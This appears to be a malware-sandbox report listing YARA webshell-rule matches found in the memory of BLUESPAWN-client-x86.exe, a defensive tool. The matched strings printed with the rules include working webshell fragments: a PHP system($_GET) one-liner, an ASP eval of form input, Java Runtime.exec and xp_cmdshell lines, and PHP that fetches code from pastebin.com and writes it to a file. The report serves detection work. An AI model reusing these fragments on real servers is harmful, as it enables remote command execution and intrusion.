| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_phpinj_2 | Webshells Auto-generated - file phpinj.php | Yara Bulk Rule Generator by Florian Roth | - 0x31e166:$s9: <? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO
- 0x36e068:$s9: <? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ZXshell2_0_rar_Folder_zxrecv | Webshells Auto-generated - file zxrecv.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31e2c5:$s0: RyFlushBuff
- 0x36e159:$s0: RyFlushBuff
- 0x31e2dd:$s1: teToWideChar^FiYP
- 0x36e167:$s1: teToWideChar^FiYP
- 0x31e2fb:$s2: mdesc+8F D
- 0x36e17b:$s2: mdesc+8F D
- 0x31e312:$s3: \von76std
- 0x36e188:$s3: \von76std
- 0x31e328:$s4: 5pur+virtul
- 0x36e194:$s4: 5pur+virtul
- 0x31e340:$s5: - Kablto io
- 0x36e1a2:$s5: - Kablto io
- 0x31e358:$s6: ac#f{lowi8a
- 0x36e1b0:$s6: ac#f{lowi8a
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_ajan | Webshells Auto-generated - file ajan.asp | Yara Bulk Rule Generator by Florian Roth | - 0x2e36fc:$s4: entrika.write "BinaryStream.SaveToFile
- 0x31e47d:$s4: entrika.write "BinaryStream.SaveToFile
- 0x344459:$s4: entrika.write "BinaryStream.SaveToFile
- 0x36e267:$s4: entrika.write "BinaryStream.SaveToFile
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | c99shell | Webshells Auto-generated - file c99shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x31e5bf:$s0: <br />Input URL: <input name=\"uploadurl\" type=\"text\"&
- 0x36e33b:$s0: <br />Input URL: <input name=\"uploadurl\" type=\"text\"&
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpspy_2005_full | Webshells Auto-generated - file phpspy_2005_full.php | Yara Bulk Rule Generator by Florian Roth | - 0x31e73b:$s7: echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlenco
- 0x36e449:$s7: echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlenco
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_zehir4_2 | Webshells Auto-generated - file zehir4.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31e8ab:$s4: "Program Files\Serv-u\Serv
- 0x36e54b:$s4: "Program Files\Serv-u\Serv
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_indexer_2 | Webshells Auto-generated - file indexer.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31e9e7:$s5: <td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
- 0x36e619:$s5: <td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31eb58:$s7: theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")
- 0x36e71c:$s7: theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")
- 0x31ebb5:$s8: scrollbar-darkshadow-color:#9C9CD3;
- 0x36e76f:$s8: scrollbar-darkshadow-color:#9C9CD3;
- 0x31ebe5:$s9: scrollbar-face-color:#E4E4F3;
- 0x36e795:$s9: scrollbar-face-color:#E4E4F3;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | _root_040_zip_Folder_deploy | Webshells Auto-generated - file deploy.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ed2f:$s5: halon synscan 127.0.0.1 1-65536
- 0x36e871:$s5: halon synscan 127.0.0.1 1-65536
- 0x31ed5b:$s8: Obviously you replace the ip address with that of the target.
- 0x36e893:$s8: Obviously you replace the ip address with that of the target.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | by063cli | Webshells Auto-generated - file by063cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31eeb4:$s2: #popmsghello,are you all right?
- 0x36e97e:$s2: #popmsghello,are you all right?
- 0x31eee0:$s4: connect failed,check your network and remote ip.
- 0x36e9a0:$s4: connect failed,check your network and remote ip.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | icyfox007v1_10_rar_Folder_asp | Webshells Auto-generated - file asp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31f03c:$s0: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
- 0x36ea8e:$s0: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_EFSO_2_2 | Webshells Auto-generated - file EFSO_2.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31c14a:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x31f1a8:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x36ca7e:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x36eb8c:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x31c1a7:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x31f205:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x36cad1:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x36ebdf:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | byshell063_ntboot_2 | Webshells Auto-generated - file ntboot.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31f37a:$s6: OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
- 0x36ece6:$s6: OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | u_uay | Webshells Auto-generated - file uay.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31f4c7:$s1: exec "c:\WINDOWS\System32\freecell.exe
- 0x36edc5:$s1: exec "c:\WINDOWS\System32\freecell.exe
- 0x31f4fa:$s9: SYSTEM\CurrentControlSet\Services\uay.sys\Security
- 0x36edee:$s9: SYSTEM\CurrentControlSet\Services\uay.sys\Security
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | bin_wuaus | Webshells Auto-generated - file wuaus.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31f646:$s1: 9(90989@9V9^9f9n9v9
- 0x36eecc:$s1: 9(90989@9V9^9f9n9v9
- 0x31f666:$s2: :(:,:0:4:8:C:H:N:T:Y:_:e:o:y:
- 0x36eee2:$s2: :(:,:0:4:8:C:H:N:T:Y:_:e:o:y:
- 0x31f690:$s3: ;(=@=G=O=T=X=\=
- 0x36ef02:$s3: ;(=@=G=O=T=X=\=
- 0x31f6ac:$s4: TCP Send Error!!
- 0x36ef14:$s4: TCP Send Error!!
- 0x31f6c9:$s5: 1"1;1X1^1e1m1w1~1
- 0x36ef27:$s5: 1"1;1X1^1e1m1w1~1
- 0x31f6e7:$s8: =$=)=/=<=Y=_=j=p=z=
- 0x36ef3b:$s8: =$=)=/=<=Y=_=j=p=z=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | pwreveal | Webshells Auto-generated - file pwreveal.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31f816:$s0: *<Blank - no es
- 0x36effc:$s0: *<Blank - no es
- 0x31f832:$s3: JDiamondCS
- 0x36f00e:$s3: JDiamondCS
- 0x31f84a:$s8: sword set> [Leith=0 bytes]
- 0x36f01c:$s8: sword set> [Leith=0 bytes]
- 0x31f871:$s9: ION\System\Floating-
- 0x36f039:$s9: ION\System\Floating-
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_xwhois | Webshells Auto-generated - file xwhois.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31f9b1:$s1: rting!
- 0x36f10b:$s1: rting!
- 0x31f9c5:$s2: aTypCog(
- 0x36f115:$s2: aTypCog(
- 0x3143e2:$s5: Diamond
- 0x3165f9:$s5: Diamond
- 0x318eae:$s5: Diamond
- 0x31f833:$s5: Diamond
- 0x31f9da:$s5: Diamond
- 0x3673fb:$s5: Diamond
- 0x368bae:$s5: Diamond
- 0x36a7b3:$s5: Diamond
- 0x36f00f:$s5: Diamond
- 0x36f120:$s5: Diamond
- 0x31f9ee:$s6: r)r=rQreryr
- 0x36f12a:$s6: r)r=rQreryr
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | vanquish_2 | Webshells Auto-generated - file vanquish.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31fb17:$s2: Vanquish - DLL injection failed:
- 0x36f1e5:$s2: Vanquish - DLL injection failed:
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | down_rar_Folder_down | Webshells Auto-generated - file down.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31fc5b:$s0: response.write "<font color=blue size=2>NetBios Name: \\" & Snet.ComputerName &
- 0x36f2bb:$s0: response.write "<font color=blue size=2>NetBios Name: \\" & Snet.ComputerName &
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cmdShell | Webshells Auto-generated - file cmdShell.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31fdc7:$s1: if cmdPath="wscriptShell" then
- 0x36f3b9:$s1: if cmdPath="wscriptShell" then
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ZXshell2_0_rar_Folder_nc | Webshells Auto-generated - file nc.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ff0b:$s0: WSOCK32.dll
- 0x36f48f:$s0: WSOCK32.dll
- 0x31ff23:$s1: ?bSUNKNOWNV
- 0x36f49d:$s1: ?bSUNKNOWNV
- 0x31ff3b:$s7: p@gram Jm6h)
- 0x36f4ab:$s7: p@gram Jm6h)
- 0x31ff54:$s8: ser32.dllCONFP@
- 0x36f4ba:$s8: ser32.dllCONFP@
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | portlessinst | Webshells Auto-generated - file portlessinst.exe | Yara Bulk Rule Generator by Florian Roth | - 0x320087:$s2: Fail To Open Registry
- 0x36f57f:$s2: Fail To Open Registry
- 0x3200a9:$s3: f<-WLEggDr"
- 0x36f597:$s3: f<-WLEggDr"
- 0x3200c1:$s6: oMemoryCreateP
- 0x36f5a5:$s6: oMemoryCreateP
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SetupBDoor | Webshells Auto-generated - file SetupBDoor.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3201ef:$s1: \BDoor\SetupBDoor
- 0x36f665:$s1: \BDoor\SetupBDoor
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpshell_3 | Webshells Auto-generated - file phpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x2d4f3d:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x2f7d26:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x32031e:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x33a6e6:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x3524e8:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x36f726:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x32036e:$s5: echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
- 0x36f76c:$s5: echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | BIN_Server | Webshells Auto-generated - file Server.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3204d9:$s0: configserver
- 0x36f869:$s0: configserver
- 0x8bd85:$s1: GetLogicalDrives
- 0x8bda2:$s1: GetLogicalDrives
- 0x10e038:$s1: GetLogicalDrives
- 0x10e055:$s1: GetLogicalDrives
- 0x3204f2:$s1: GetLogicalDrives
- 0x36f878:$s1: GetLogicalDrives
- 0x112029:$s2: WinExec
- 0x113211:$s2: WinExec
- 0x32050f:$s2: WinExec
- 0x36f88b:$s2: WinExec
- 0x320523:$s4: fxftest
- 0x36f895:$s4: fxftest
- 0x320537:$s5: upfileok
- 0x36f89f:$s5: upfileok
- 0x32054c:$s7: upfileer
- 0x36f8aa:$s7: upfileer
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop2006_rar_Folder_2006 | Webshells Auto-generated - file 2006.asp | Yara Bulk Rule Generator by Florian Roth | - 0x32067d:$s6: strBackDoor = strBackDoor
- 0x36f96d:$s6: strBackDoor = strBackDoor
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | r57shell_3 | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x3207b5:$s1: <b>".$_POST['cmd']
- 0x36fa37:$s1: <b>".$_POST['cmd']
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HDConfig | Webshells Auto-generated - file HDConfig.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3208e3:$s0: An encryption key is derived from the password hash.
- 0x36faf7:$s0: An encryption key is derived from the password hash.
- 0x320925:$s3: A hash object has been created.
- 0x36fb2f:$s3: A hash object has been created.
- 0x320952:$s4: Error during CryptCreateHash!
- 0x36fb52:$s4: Error during CryptCreateHash!
- 0x32097c:$s5: A new key container has been created.
- 0x36fb72:$s5: A new key container has been created.
- 0x3209ae:$s6: The password has been added to the hash.
- 0x36fb9a:$s6: The password has been added to the hash.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_ajan_2 | Webshells Auto-generated - file ajan.asp | Yara Bulk Rule Generator by Florian Roth | - 0x2e0b5f:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x320af3:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x342709:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x36fc71:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x320b2f:$s3: /file.zip
- 0x36fca3:$s3: /file.zip
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Webshell_and_Exploit_CN_APT_HK | Webshell and Exploit Code in relation with APT against Honk Kong protesters | Florian Roth | - 0x320c9a:$a0: <script language=javascript src=http://java-se.com/o.js</script>
- 0x320ce7:$s0: <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
- 0x36fdc9:$s0: <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
- 0x320d57:$s1: <input type="hidden" name="doing" value="login">
- 0x36fe2f:$s1: <input type="hidden" name="doing" value="login">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JSP_Browser_APT_webshell | VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a | F.Roth | - 0x320e80:$a1a: private static final String[] COMMAND_INTERPRETER = {"
- 0x36fef8:$a1a: private static final String[] COMMAND_INTERPRETER = {"
- 0x320ec3:$a1b: cmd", "/C"}; // Dos,Windows
- 0x36ff32:$a1b: cmd", "/C"}; // Dos,Windows
- 0x320eeb:$a2: Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
- 0x36ff50:$a2: Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
- 0x320f3f:$a3: ret.append("!!!! Process has timed out, destroyed !!!!!");
- 0x36ff9a:$a3: ret.append("!!!! Process has timed out, destroyed !!!!!");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JSP_jfigueiredo_APT_webshell | JSP Browser used as web shell by APT groups - author: jfigueiredo | F.Roth | - 0x3210cb:$a1: String fhidden = new String(Base64.encodeBase64(path.getBytes()));
- 0x3700ab:$a1: String fhidden = new String(Base64.encodeBase64(path.getBytes()));
- 0x32111a:$a2: <form id="upload" name="upload" action="ServFMUpload" method="POST" enctype="multipart/form-data">
- 0x3700f0:$a2: <form id="upload" name="upload" action="ServFMUpload" method="POST" enctype="multipart/form-data">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JSP_jfigueiredo_APT_webshell_2 | JSP Browser used as web shell by APT groups - author: jfigueiredo | F.Roth | - 0x3212c5:$a1: <div id="bkorotator"><img alt="" src="images/rotator/1.jpg"></div>
- 0x370220:$a1: <div id="bkorotator"><img alt="" src="images/rotator/1.jpg"></div>
- 0x321314:$a2: $("#dialog").dialog("destroy");
- 0x370265:$a2: $("#dialog").dialog("destroy");
- 0x321340:$s1: <form id="form" action="ServFMUpload" method="post" enctype="multipart/form-data">
- 0x370287:$s1: <form id="form" action="ServFMUpload" method="post" enctype="multipart/form-data">
- 0x32139f:$s2: <input type="hidden" id="fhidden" name="fhidden" value="L3BkZi8=" />
- 0x3702dc:$s2: <input type="hidden" id="fhidden" name="fhidden" value="L3BkZi8=" />
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Webshell_Insomnia | Insomnia Webshell - file InsomniaShell.aspx | Florian Roth | - 0x3215ac:$s0: Response.Write("- Failed to create named pipe:");
- 0x3215ea:$s1: Response.Output.Write("+ Sending {0}<br>", command);
- 0x32162b:$s2: String command = "exec master..xp_cmdshell 'dir > \\\\127.0.0.1
- 0x3704b6:$s2: String command = "exec master..xp_cmdshell 'dir > \\\\127.0.0.1
- 0x321677:$s3: Response.Write("- Error Getting User Info<br>");
- 0x3216b4:$s4: string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
- 0x321703:$s5: [DllImport("Advapi32.dll", SetLastError = true)]
- 0x321740:$s9: username = DumpAccountSid(tokUser.User.Sid);
- 0x321779:$s14: //Response.Output.Write("Opened process PID: {0} : {1}<br>", p
- 0x3705d3:$s14: //Response.Output.Write("Opened process PID: {0} : {1}<br>", p
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SoakSoak_Infected_Wordpress | Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX | Florian Roth | - 0x321ab8:$s0: wp_enqueue_script("swfobject");
- 0x321ae4:$s1: function FuncQueueObject()
- 0x321b0b:$s2: add_action("wp_enqueue_scripts", 'FuncQueueObject');
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Pastebin_Webshell | Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs | Florian Roth | - 0x321cbc:$s0: file_get_contents("http://pastebin.com
- 0x37093f:$s0: file_get_contents("http://pastebin.com
- 0x321cef:$s1: xcurl('http://pastebin.com/download.php
- 0x370968:$s1: xcurl('http://pastebin.com/download.php
- 0x321d23:$s2: xcurl('http://pastebin.com/raw.php
- 0x370992:$s2: xcurl('http://pastebin.com/raw.php
- 0x321d52:$x0: if($content){unlink('evex.php');
- 0x3709b7:$x0: if($content){unlink('evex.php');
- 0x321d7f:$x1: $fh2 = fopen("evex.php", 'a');
- 0x3709da:$x1: $fh2 = fopen("evex.php", 'a');
- 0x321daa:$y0: file_put_contents($pth
- 0x3709fb:$y0: file_put_contents($pth
- 0x321dcd:$y1: echo "<login_ok>
- 0x370a14:$y1: echo "<login_ok>
- 0x321dea:$y2: str_replace('* @package Wordpress',$temp
- 0x370a27:$y2: str_replace('* @package Wordpress',$temp
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ASPXspy2 | Web shell - file ASPXspy2.aspx | Florian Roth | - 0x321f69:$s0: string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin
- 0x370b15:$s0: string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin
- 0x321fbd:$s1: SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" O
- 0x370b5f:$s1: SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" O
- 0x322014:$s3: Process[] p=Process.GetProcesses();
- 0x322044:$s4: Response.Cookies.Add(new HttpCookie(vbhLn,Password));
- 0x322086:$s5: [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
- 0x3220c9:$s6: <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssCl
- 0x370c43:$s6: <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssCl
- 0x322122:$s7: ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
- 0x32217f:$s8: Copyright © 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_bla
- 0x370ce5:$s8: Copyright © 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_bla
- 0x3221d9:$s10: Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.
- 0x370d36:$s10: Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.
- 0x322232:$s11: nxeDR.Command+=new CommandEventHandler(this.iVk);
- 0x322270:$s12: <%@ import Namespace="System.ServiceProcess"%>
- 0x3222ab:$s13: foreach(string innerSubKey in sk.GetSubKeyNames())
- 0x3222ea:$s17: Response.Redirect("http://www.rootkit.net.cn");
- 0x322326:$s20: else if(Reg_Path.StartsWith("HKEY_USERS"))
|
| Click to see the 1519 entries |
Play interactive tour
Create Interactive Tour
